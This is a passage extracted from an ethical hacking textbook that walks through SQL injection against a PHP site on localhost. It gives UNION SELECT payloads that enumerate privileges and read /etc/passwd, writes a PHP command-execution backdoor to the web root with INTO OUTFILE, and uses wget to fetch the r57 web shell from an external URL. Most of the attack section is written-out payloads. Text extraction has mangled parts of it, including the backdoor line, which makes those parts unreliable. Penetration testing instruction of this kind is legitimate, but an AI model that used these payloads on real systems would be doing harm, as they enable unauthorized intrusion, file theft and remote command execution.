353
Syntax
http://localhost/index.php?support=yes’ and 1=0 UNION SELECT 1,group_concat(privilege_
type),3,4,5,6 FROM information_schema.schema_privileges--
The database returns all the privileges that the current user has.
Reading Files
To read a file on the operating system, we will use
load _ file()
. Let’s try reading the
/etc/
passwd
file.
http://localhost/index.php?support=yes’ and 1=0 UNION SELECT 1,LOAD_FILE(‘
/etc/
passwd
’),3,4,5,6 FROM information_schema.schema_schemata--
We have successfully managed to read the
/etc/passwd
file. In some cases, where an error
returns while reading a particular file, try converting the string to its hex equivalent. The query
now becomes
Syntax
http://localhost/index.php?support=yes’ and 1=0 UNION SELECT 1, LOAD_FILE(0x2f65746
32f706173737764),3,4,5,6 FROM information_schema.schema_schemata--
Writing Files
Next, we can upload a simple PHP backdoor that would allow us to execute commands on
the system, for which we need to find a writable directory. We will upload our backdoor to
354
◾
Ethical Hacking and Penetration Testing Guide
/var/www
directory, which is our current directory that happens to be writable. You can deter-
mine the current directory by executing the
datadir()
function.
Our simple one-line backdoor is as follows:
This will help us execute system commands via the GET parameter CMD. The
passthru()
in PHP allows us to execute arbitrary commands upon the system. To write files in the directory,
we will use
INTO OUTOFILE
command and specify the directory.
Syntax
http://localhost/index.php?support=yes’ and 1=0 UNION SELECT 1,GET[\’cmd’\’)]);>,3,4,5,6 INTO OUTFILE ‘/var/www/shell.php’ –
Therefore, as the command is pretty much simple, it will write the PHP code in the column
to a file shell.php.
If everything goes fine, we should have got our backdoor uploaded and we can easily execute
commands via the cmd parameter. Let’s try reading
/etc/passwd
.
Syntax
http://localhost/shell.php?cmd=cat/etc/passwd
Here, we can execute our commands on the target system, which is Linux based. We would
try to read Linux-specific files. If it were running a Windows OS, we would have tried to read files
such as “boot.ini” or “winboot.ini”.
Since we are now able to execute our commands upon the system, we will now try to down-
load a more powerful backdoor from an external url and write onto the system. We can use wget
to download a file from an external location with parameter –O to output the particular file to a
location.
Syntax
wget “http://target.com/r57.txt” –O r57.php
Now, we can directly access our r57.php shell by accessing the following url:
http://localhost/r57.php
Web Hacking
◾
Dostları ilə paylaş: |